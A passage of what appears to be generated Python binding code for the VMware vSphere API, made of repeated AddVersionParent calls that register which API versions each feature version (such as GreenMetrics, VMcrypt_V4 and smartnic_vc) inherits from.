AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version13")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version14")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version15")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version10")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version11")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version12")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version8")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version9")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version6")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version7")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version4")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version5")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.version3")
AddVersionParent("vim.version.GreenMetrics", "vim.version.GreenMetrics")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version4")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version3")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.query.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.version.version0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v6_9_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v6_8_7")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version13")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version14")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version15")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version10")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version11")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version12")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.v7_0")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version8")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version9")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version6")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version7")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version1")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version4")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version5")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version2")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.version3")
AddVersionParent("vim.version.hostVendorSpecificStatus", "vim.version.hostVendorSpecificStatus")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version4")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version3")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.query.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.version.version0")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v6_9_1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v6_8_7")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version13")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version14")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version15")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version10")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version11")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version12")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.v7_0")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version8")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version9")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version6")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version7")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version1")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version4")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version5")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version2")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.version3")
AddVersionParent("vim.version.VMcrypt_V4", "vim.version.VMcrypt_V4")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version4")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version3")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vmodl.query.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.hostAccessManager", "vmodl.version.version0")
AddVersionParent("vim.version.hostAccessManager", "vmodl.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vmodl.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v6_9_1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v6_8_7")
AddVersionParent("vim.version.hostAccessManager", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version13")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version14")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version15")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version10")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version11")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version12")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.v7_0")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version8")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version9")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version6")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version7")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version1")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version4")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version5")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version2")
AddVersionParent("vim.version.hostAccessManager", "vim.version.version3")
AddVersionParent("vim.version.hostAccessManager", "vim.version.hostAccessManager")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version4")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version3")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.query.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.version.version0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v6_9_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v6_8_7")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version13")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version14")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version15")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version10")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version11")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version12")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.v7_0")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version8")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version9")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version6")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version7")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version1")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version4")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version5")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version2")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.version3")
AddVersionParent("vim.version.ocmSupportedForReconfigure", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version4")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version3")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.query.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.version.version0")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "dp.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version13")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version14")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version15")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version10")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version11")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version12")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version8")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version9")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version6")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version7")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version1")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version4")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version5")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version2")
AddVersionParent("dp.version.v8_0_0_0", "vim.version.version3")
AddVersionParent("dp.version.v8_0_0_0", "dp.version.v8_0_0_0")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version4")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version3")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vmodl.query.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VirtualTopo", "vmodl.version.version0")
AddVersionParent("vim.version.VirtualTopo", "vmodl.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vmodl.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v6_9_1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v6_8_7")
AddVersionParent("vim.version.VirtualTopo", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version13")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version14")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version15")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version10")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version11")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version12")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.v7_0")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version8")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version9")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version6")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version7")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version1")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version4")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version5")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version2")
AddVersionParent("vim.version.VirtualTopo", "vim.version.version3")
AddVersionParent("vim.version.VirtualTopo", "vim.version.VirtualTopo")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version4")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version3")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.query.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.version.version0")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v6_9_1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v6_8_7")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version13")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version14")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version15")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version10")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version11")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version12")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.v7_0")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version8")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version9")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version6")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version7")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version1")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version4")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version5")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version2")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.version3")
AddVersionParent("vim.version.Tools_Update_Health", "vim.version.Tools_Update_Health")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version4")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version3")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.query.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.version.version0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v6_9_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v6_8_7")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version13")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version14")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version15")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version10")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version11")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version12")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.v7_0")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version8")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version9")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version6")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version7")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version1")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version4")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version5")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version2")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.version3")
AddVersionParent("vim.version.CPU_Scheduler_Info", "vim.version.CPU_Scheduler_Info")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version4")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version3")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.query.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.version.version0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v6_9_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v6_8_7")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version13")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version14")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version15")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version10")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version11")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version12")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.v7_0")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version8")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version9")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version6")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version7")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version1")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version4")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version5")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version2")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.version3")
AddVersionParent("vim.version.VM_CLONE_REKEY_TPM", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version4")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version3")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.query.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.version.version0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v6_9_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v6_8_7")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version13")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version14")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version15")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version10")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version11")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version12")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.v7_0")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version8")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version9")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version6")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version7")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version1")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version4")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version5")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version2")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.version3")
AddVersionParent("vim.version.FCD_CATALOG_HEALTH", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version4")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version3")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vmodl.query.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.smartnic_vc", "vmodl.version.version0")
AddVersionParent("vim.version.smartnic_vc", "vmodl.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vmodl.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v6_9_1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v6_8_7")
AddVersionParent("vim.version.smartnic_vc", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.smartnic_vc", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.smartnic_vc", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version13")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version14")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version15")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version10")
AddVersionParent("vim.version.smartnic_vc", "vim.version.version11")
